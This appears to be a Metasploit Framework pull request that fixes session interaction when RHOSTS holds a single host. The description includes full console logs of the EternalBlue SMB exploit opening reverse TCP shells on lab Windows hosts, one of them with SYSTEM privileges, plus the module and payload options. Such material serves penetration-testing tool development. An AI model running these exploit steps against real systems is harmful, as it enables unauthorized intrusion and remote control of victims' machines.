### PR TITLE
Fix issue that not interact with session when exploit with single-host rhosts.

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -165,10 +165,10 @@ class Exploit
     end
 
     rhosts = mod.datastore['RHOSTS']
+    rhosts_range = Rex::Socket::RangeWalker.new(rhosts)
     # For multiple targets exploit attempts.
-    if rhosts
+    if rhosts && rhosts_range.length.to_i > 1
       opts[:multi] = true
-      rhosts_range = Rex::Socket::RangeWalker.new(rhosts)
       rhosts_range.each do |rhost|
         nmod = mod.replicant
         nmod.datastore['RHOST'] = rhost
@@ -193,7 +193,7 @@ class Exploit
           any_session = true
         end
       end
-    # For single target.
+    # For single target or no rhosts option.
     else
       session = exploit_single(mod, opts)
       # If we were given a session, let's see what we can do with it


### PR DESCRIPTION
Fix #10748 

## Single-host

Interact with session once created.
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.6.88
rhosts => 192.168.6.88
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.6.164:4444 -> 192.168.6.88:49161) at 2018-10-05 17:28:27 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system
```

## multiple host

Put session backgroud.
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOSTS              192.168.6.88/30  yes       The target address range or CIDR identifier
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.6.164    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Exploiting target 192.168.6.88

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 3 opened (192.168.6.164:4444 -> 192.168.6.88:49160) at 2018-10-05 17:27:16 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
[*] Exploiting target 192.168.6.89
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.89:445 - Connecting to target for exploitation.
[-] 192.168.6.89:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.89:445).
[*] Exploiting target 192.168.6.90
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.90:445 - Connecting to target for exploitation.
[-] 192.168.6.90:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.90:445).
[*] Exploiting target 192.168.6.91
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.91:445 - Connecting to target for exploitation.
^C[-] 192.168.6.91:445 - Exploit failed [user-interrupt]: Interrupt
[*] Stopping exploiting current target 192.168.6.91...
[*] Control-C again to force quit exploiting all targets.
^C[-] exploit: Interrupted
```